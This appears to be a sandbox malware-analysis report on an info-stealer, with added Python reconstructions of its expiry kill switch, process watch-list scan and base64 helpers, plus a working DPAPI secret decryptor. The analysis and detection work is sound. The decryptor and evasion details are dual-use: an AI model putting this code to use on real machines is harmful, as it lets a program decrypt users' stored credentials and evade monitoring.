                                • Opcode Fuzzy Hash: e08513a433fbdb050d94e147d75e71f92704544db75523194b8c635db61074a2
                                • Instruction Fuzzy Hash: 3721CB75D1420CABCF04EFE4E9499EEB7B9BF48304F04852AE506E3250EB355609DBA9
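The API sequence in this record (GetSystemTime, sscanf, SystemTimeToFileTime on two SYSTEMTIME structures, then ExitProcess) has the shape of a build-expiry kill switch: a hard-coded date string is parsed, the parsed date and the current time are both converted to FILETIME so they can be compared as 64-bit tick counts, and the process exits once the deadline has passed. The Python below is an added example reconstructing that logic; it is not code from the report or from the sample. The "YYYY-MM-DD" format, the deadline value and the direction of the comparison (exit once the clock is past the deadline) are assumptions, because the report shows the calls but not the format string or the compare.

```python
import re
from datetime import date, datetime, timezone

# 100-ns ticks between 1601-01-01 (FILETIME epoch) and 1970-01-01 (Unix epoch)
EPOCH_DIFF_TICKS = 116444736000000000


def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, ms=0):
    """Mirror SystemTimeToFileTime: 100-ns ticks since 1601-01-01 00:00:00 UTC as one integer.
    Converting both sides to this form is what turns a date check into a single 64-bit compare."""
    days = (date(year, month, day) - date(1601, 1, 1)).days
    seconds = days * 86400 + hour * 3600 + minute * 60 + second
    return seconds * 10_000_000 + ms * 10_000


def parse_expiry(text):
    """Stand-in for the sscanf call. The 'YYYY-MM-DD' format is an assumption (the report does
    not show the format string). A malformed string is rejected here; an unchecked sscanf
    would only report fewer assigned fields and leave the SYSTEMTIME members as they were."""
    m = re.fullmatch(r"\s*(\d{4})-(\d{1,2})-(\d{1,2})\s*", text)
    if not m:
        raise ValueError("expiry string does not match the assumed YYYY-MM-DD format")
    return tuple(int(g) for g in m.groups())


def should_exit(now_systemtime, expiry_text):
    """True when the current time (SYSTEMTIME-like tuple: y, M, d, h, m, s, ms) is past the
    parsed deadline. The direction of the compare (exit once past it) is an assumption."""
    y, mo, d = parse_expiry(expiry_text)
    deadline = systemtime_to_filetime(y, mo, d)
    now = systemtime_to_filetime(*now_systemtime)
    return now > deadline


def current_systemtime():
    """Equivalent of GetSystemTime: UTC fields as a tuple."""
    t = datetime.now(timezone.utc)
    return (t.year, t.month, t.day, t.hour, t.minute, t.second, t.microsecond // 1000)


if __name__ == "__main__":
    # constructed deadline: the sample's real value is not in the report
    print("ExitProcess" if should_exit(current_systemtime(), "2024-10-27") else "continue")
```

For analysis this matters because a sandbox whose clock is already past the deadline sees the process exit before any stealer activity and the run looks benign. Setting the system clock before the deadline, or patching the compare that follows the second SystemTimeToFileTime, gets past the check.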
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0008724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00087254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00087281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000872A4
                                • LocalFree.KERNEL32(?), ref: 000872AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 58c29c7ca52253026c4cabb1ac25f5777bf83710273d2d443fed6b404dda830c
                                • Instruction ID: 6baab73669f6eb53c19e37e24e0913d04fe4b88bb647246a582df4924e9b6cee
                                • Opcode Fuzzy Hash: 58c29c7ca52253026c4cabb1ac25f5777bf83710273d2d443fed6b404dda830c
                                • Instruction Fuzzy Hash: 3F011275A40208BBEB10DFE4DD4AF9D77B8FB44704F104155FB05AB2C0D670AA008B65
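This record (RtlAllocateHeap of 0x400 bytes with HEAP_ZERO_MEMORY, CryptUnprotectData with dwFlags = 1, WideCharToMultiByte, LocalFree) is the standard DPAPI unwrap of a secret that was stored as a UTF-16 string: the blob is decrypted under the current user's master key, the plaintext is narrowed to ANSI, and the API-allocated output buffer is released with LocalFree. dwFlags = 1 is CRYPTPROTECT_UI_FORBIDDEN, so the call fails rather than showing a prompt. The Python below is an added example, not the sample's code: describe_dpapi_blob parses the documented fixed header of a DPAPI blob (enough to tell an analyst which master key is needed for offline decryption), and dpapi_unprotect_utf16 reproduces the call sequence through ctypes on Windows. The sample header in the test is constructed.

```python
import ctypes
import struct
import sys
import uuid

# Provider GUID at offset 4 of every DPAPI blob (documented format, not sample-specific)
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_UI_FORBIDDEN = 0x1   # the dwFlags value seen in the CryptUnprotectData call


def describe_dpapi_blob(blob):
    """Parse the fixed header of a DPAPI blob without decrypting it.

    Layout: version (DWORD, 1), provider GUID, master-key version (DWORD), master-key GUID,
    flags (DWORD), description length (DWORD), UTF-16 description. The master-key GUID names
    the file under %APPDATA%\\Microsoft\\Protect\\<SID>\\ needed to decrypt the blob offline."""
    if len(blob) < 48:
        raise ValueError("too short to be a DPAPI blob")
    version, = struct.unpack_from("<I", blob, 0)
    provider = uuid.UUID(bytes_le=blob[4:20])
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad version or provider GUID)")
    mk_version, = struct.unpack_from("<I", blob, 20)
    master_key = uuid.UUID(bytes_le=blob[24:40])
    flags, descr_len = struct.unpack_from("<II", blob, 40)
    description = blob[48:48 + descr_len].decode("utf-16-le", "replace").rstrip("\x00")
    return {"master_key_guid": str(master_key), "master_key_version": mk_version,
            "flags": flags, "description": description}


def build_test_header(master_key_guid, description=""):
    """Construct only the fixed header (no ciphertext) for exercising describe_dpapi_blob."""
    descr = (description + "\x00").encode("utf-16-le") if description else b""
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le + struct.pack("<I", 1)
            + uuid.UUID(master_key_guid).bytes_le + struct.pack("<II", 0, len(descr)) + descr)


class DATA_BLOB(ctypes.Structure):
    _fields_ = [("cbData", ctypes.c_uint32), ("pbData", ctypes.POINTER(ctypes.c_ubyte))]


def dpapi_unprotect_utf16(blob):
    """Windows only. CryptUnprotectData -> UTF-16 plaintext -> str, then LocalFree on the
    output buffer, mirroring the record above. The WideCharToMultiByte step is replaced by
    str.decode, so there is no fixed 0x400-byte output limit here."""
    if sys.platform != "win32":
        raise OSError("CryptUnprotectData requires Windows")
    crypt32 = ctypes.WinDLL("crypt32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.LocalFree.argtypes = [ctypes.c_void_p]
    kernel32.LocalFree.restype = ctypes.c_void_p
    buf = (ctypes.c_ubyte * len(blob)).from_buffer_copy(blob)
    data_in = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_ubyte)))
    data_out = DATA_BLOB()
    ok = crypt32.CryptUnprotectData(ctypes.byref(data_in), None, None, None, None,
                                    CRYPTPROTECT_UI_FORBIDDEN, ctypes.byref(data_out))
    if not ok:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        raw = ctypes.string_at(data_out.pbData, data_out.cbData)
    finally:
        # pbData is allocated by the API and must be released with LocalFree, not HeapFree
        kernel32.LocalFree(ctypes.cast(data_out.pbData, ctypes.c_void_p))
    return raw.decode("utf-16-le").rstrip("\x00")
```

The sample narrows the plaintext into a 0x400-byte heap block (the RtlAllocateHeap size visible above), so any secret longer than 1024 ANSI bytes makes its WideCharToMultiByte call fail with ERROR_INSUFFICIENT_BUFFER; the Python version decodes the whole buffer instead. Because CRYPTPROTECT_UI_FORBIDDEN is set and no entropy is passed, the decryption succeeds silently for any blob protected under the same user account, which is exactly what makes DPAPI-stored browser and application secrets reachable to code running as that user.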
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0009961E
                                • Process32First.KERNEL32(000A0ACA,00000128), ref: 00099632
                                • Process32Next.KERNEL32(000A0ACA,00000128), ref: 00099647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0009965C
                                • CloseHandle.KERNEL32(000A0ACA), ref: 0009967A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 7757566010108f417a7abe5d36587dc775015db55e9605541bc31bbec28cd01b
                                • Instruction ID: 0b66e62a007652c1e98bd5b7b0b0b0091a34d21ec5c262e12fba75dd7fb5a12b
                                • Opcode Fuzzy Hash: 7757566010108f417a7abe5d36587dc775015db55e9605541bc31bbec28cd01b
                                • Instruction Fuzzy Hash: AD010C75A00208EBCF24DFA5DD48FEDBBF8FB48304F104288A90696240D7349B44DF51
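The Toolhelp32 walk in this record (CreateToolhelp32Snapshot with TH32CS_SNAPPROCESS = 2, Process32First/Process32Next into a 0x128-byte PROCESSENTRY32, StrCmpCA against szExeFile, CloseHandle) is how the sample searches the process list for particular image names. Two details matter to a practitioner: 0x128 (296) is sizeof(PROCESSENTRY32) for a 32-bit ANSI build and must be set in dwSize before Process32First or the call fails, and StrCmpCA is a case-sensitive compare, so the check only hits an exact-case name. The Python below is an added example, not the sample's code: enumerate_processes reproduces the API sequence through ctypes on Windows, and match_watchlist isolates the compare so the case-sensitivity point can be exercised anywhere. The watch list is constructed for illustration; the sample's real list is not in the report.

```python
import ctypes
import sys

TH32CS_SNAPPROCESS = 0x00000002            # first argument of the CreateToolhelp32Snapshot call
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
MAX_PATH = 260


class PROCESSENTRY32(ctypes.Structure):
    # ANSI layout: sizeof() is 0x128 (296) on 32-bit, 304 on 64-bit (th32DefaultHeapID is pointer-sized)
    _fields_ = [("dwSize", ctypes.c_uint32), ("cntUsage", ctypes.c_uint32),
                ("th32ProcessID", ctypes.c_uint32), ("th32DefaultHeapID", ctypes.c_size_t),
                ("th32ModuleID", ctypes.c_uint32), ("cntThreads", ctypes.c_uint32),
                ("th32ParentProcessID", ctypes.c_uint32), ("pcPriClassBase", ctypes.c_int32),
                ("dwFlags", ctypes.c_uint32), ("szExeFile", ctypes.c_char * MAX_PATH)]


def processentry32_size():
    """The dwSize value the code must pass; 296 on a 32-bit build like the one in the report."""
    return ctypes.sizeof(PROCESSENTRY32)


def enumerate_processes():
    """Windows only: return [(pid, exe_name)] using the same Toolhelp32 sequence as the record."""
    if sys.platform != "win32":
        raise OSError("Toolhelp32 requires Windows")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateToolhelp32Snapshot.restype = ctypes.c_void_p
    k32.CreateToolhelp32Snapshot.argtypes = [ctypes.c_uint32, ctypes.c_uint32]
    for name in ("Process32First", "Process32Next"):
        getattr(k32, name).argtypes = [ctypes.c_void_p, ctypes.POINTER(PROCESSENTRY32)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
    if snap is None or snap == INVALID_HANDLE_VALUE:
        raise ctypes.WinError(ctypes.get_last_error())
    entry = PROCESSENTRY32()
    entry.dwSize = processentry32_size()      # required before Process32First
    found = []
    try:
        ok = k32.Process32First(snap, ctypes.byref(entry))
        while ok:
            found.append((entry.th32ProcessID, entry.szExeFile.decode("mbcs", "replace")))
            ok = k32.Process32Next(snap, ctypes.byref(entry))
    finally:
        k32.CloseHandle(snap)                 # the snapshot handle, as in the record
    return found


def match_watchlist(exe_names, watchlist, case_sensitive=True):
    """Names from the snapshot that hit the watch list. case_sensitive=True reproduces StrCmpCA,
    the call the sample makes; the False branch is what a StrCmpICA-based check would do."""
    if case_sensitive:
        wanted = set(watchlist)
        return [n for n in exe_names if n in wanted]
    wanted = {w.lower() for w in watchlist}
    return [n for n in exe_names if n.lower() in wanted]


if __name__ == "__main__":
    # constructed watch list; the sample's actual target names are not in the report
    names = [exe for _, exe in enumerate_processes()]
    print(match_watchlist(names, ["Taskmgr.exe", "procexp.exe"]))
```

Because the compare is case-sensitive, a monitoring tool running under a differently-cased file name is invisible to this particular check; the same walk with StrCmpICA, or with a lowercase-normalised list as in the case_sensitive=False branch, would catch it. For detection, the sequence CreateToolhelp32Snapshot followed by a StrCmp over every entry is itself a useful behavioural marker when it appears in a process that has no legitimate reason to inspect its neighbours.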
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Njr$PZ{/$bAg_$fAg_
                                • API String ID: 0-991460530
                                • Opcode ID: d4beeb6742c3bac520c4af524fbea6253b2c4776e9a4125b018907daa1ece6e8
                                • Instruction ID: 7921b2d9ca62e85b69969e75ad75fe063148f7e8f646b0124909654a78ccff58
                                • Opcode Fuzzy Hash: d4beeb6742c3bac520c4af524fbea6253b2c4776e9a4125b018907daa1ece6e8
                                • Instruction Fuzzy Hash: 61A2E2F3A082009FE3046E29DC8577AFBE9EF94720F1A493DEAC593740E63598058787
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00085184,40000001,00000000,00000000,?,00085184), ref: 00098EC0
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 719d190bed3db6718c233ab0f3fb32a0cdcefe89079d32cdd3fe6cb4c019c68c
                                • Instruction ID: 22504cfc9f0935ffe7b6bd86b6a52b0caf35c56c13643e60926f462d9a382a69
                                • Opcode Fuzzy Hash: 719d190bed3db6718c233ab0f3fb32a0cdcefe89079d32cdd3fe6cb4c019c68c
                                • Instruction Fuzzy Hash: 21110670200208AFDF40CF64E898FAA33A9AF8A304F10E558F9198B350DB35E841EB60
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                • LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 1eb95aa87054b91d7a35c6c80b51b2d15caee9162813e3be58903358057b7b4c
                                • Instruction ID: 9a6127d002cceeec661d744ba68c76980b915c2151ae74dd58f17e10827b1432
                                • Opcode Fuzzy Hash: 1eb95aa87054b91d7a35c6c80b51b2d15caee9162813e3be58903358057b7b4c
                                • Instruction Fuzzy Hash: BA11A2B4241208AFEB10DF64DC99FAA77B5FB89704F208158F9199B390C7B6A901CB94
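The two records above (CryptBinaryToStringA at 00098EC0, and CryptStringToBinaryA with LocalAlloc/LocalFree at 00089AEF..00089B3F; the same encoder also appears in the lstrcat/lstrlen record at the top of this section) are the CryptoAPI base64 helpers. The encoder's flags 0x40000001 decompose as CRYPT_STRING_BASE64 (0x1) | CRYPT_STRING_NOCRLF (0x40000000), so the output is one unbroken line with no trailing CRLF; the decoder's flag 1 is plain CRYPT_STRING_BASE64. Both are called twice, first with a NULL output buffer to learn the required size, then, after LocalAlloc with LMEM_ZEROINIT (0x40) in the decoder's case, to fill it. The Python below is an added example that emulates those flag semantics so an analyst can reproduce the exact text the sample produces or accepts; it is not the sample's code and the inputs are constructed.

```python
import base64
import binascii

CRYPT_STRING_BASE64 = 0x00000001
CRYPT_STRING_NOCRLF = 0x40000000
SAMPLE_ENCODE_FLAGS = CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF   # 0x40000001 in the record
LMEM_ZEROINIT = 0x0040                                            # LocalAlloc flag in the record


def crypt_binary_to_string(data, flags):
    """Emulate CryptBinaryToStringA for the base64 variants.

    Without NOCRLF the API wraps the output into 64-character lines, each followed by CRLF
    (the last one included). Returns (text, pcchString), where the count includes the
    terminating NUL, as the size-query call reports it."""
    if (flags & 0xFF) != CRYPT_STRING_BASE64:
        raise ValueError("only CRYPT_STRING_BASE64 is emulated here")
    b64 = base64.b64encode(data).decode("ascii")
    if flags & CRYPT_STRING_NOCRLF:
        text = b64
    else:
        text = "".join(b64[i:i + 64] + "\r\n" for i in range(0, len(b64), 64))
    return text, len(text) + 1


def crypt_string_to_binary(text, flags):
    """Emulate CryptStringToBinaryA(..., CRYPT_STRING_BASE64, ...): strict alphabet and
    padding, CR/LF between lines tolerated. Raises ValueError where the API would fail
    with ERROR_INVALID_DATA."""
    if flags != CRYPT_STRING_BASE64:
        raise ValueError("only CRYPT_STRING_BASE64 is emulated here")
    cleaned = text.replace("\r", "").replace("\n", "")
    try:
        return base64.b64decode(cleaned, validate=True)
    except binascii.Error as exc:
        raise ValueError("ERROR_INVALID_DATA: not valid base64") from exc


def encode_like_sample(data):
    """What the encoder record produces for a given buffer: single-line base64, no CRLF."""
    text, _ = crypt_binary_to_string(data, SAMPLE_ENCODE_FLAGS)
    return text


def decode_like_sample(text):
    """The decoder record's two-call pattern: size query, zero-initialised allocation, fill."""
    size = len(crypt_string_to_binary(text, CRYPT_STRING_BASE64))   # call 1: pcbBinary only
    buf = bytearray(size)                                            # LocalAlloc(LMEM_ZEROINIT, size)
    buf[:] = crypt_string_to_binary(text, CRYPT_STRING_BASE64)       # call 2: fill the buffer
    return bytes(buf)
```

The NOCRLF detail is what to remember when matching the sample's output against network captures: the same buffer encoded with flag 0x1 alone would carry a CRLF every 64 characters and a trailing one, so a signature written against one form misses the other.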
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D0EB10,00000000,?,000A0E10,00000000,?,00000000,00000000), ref: 00097A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00097A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D0EB10,00000000,?,000A0E10,00000000,?,00000000,00000000,?), ref: 00097A7D
                                • wsprintfA.USER32 ref: 00097AB7
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 3b6bd9e69828a4bf1b74210f1bf6dee4c04cc525210b233ca639c363bf3c21b8
                                • Instruction ID: 41ed6f284bbcf8af567a5e4150229919316100de69810ab92589b55dcf55d1a4
                                • Opcode Fuzzy Hash: 3b6bd9e69828a4bf1b74210f1bf6dee4c04cc525210b233ca639c363bf3c21b8
                                • Instruction Fuzzy Hash: E111A1B1945218EBEB20CF54DC49FA9B7B8FB44721F10439AEA0A932C0C7741E40CF52
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
